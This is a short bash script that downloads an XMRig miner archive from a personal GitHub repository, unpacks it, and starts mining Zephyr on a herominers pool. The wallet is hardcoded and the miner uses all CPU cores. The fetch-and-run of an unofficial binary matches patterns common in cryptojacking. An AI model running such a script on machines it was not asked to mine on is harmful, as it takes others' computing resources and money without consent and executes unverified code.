#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHs6xswbu7Dvtb727mV2Agdu4RnEKDZRyX7UYP9HmsLsY2wfL63MF3P2vRWDLDx3Fq69SnCevvrNMtBRfnXZjDUXzztJwX1Zd -p SEENG -a rx/0 -t $(nproc --all)
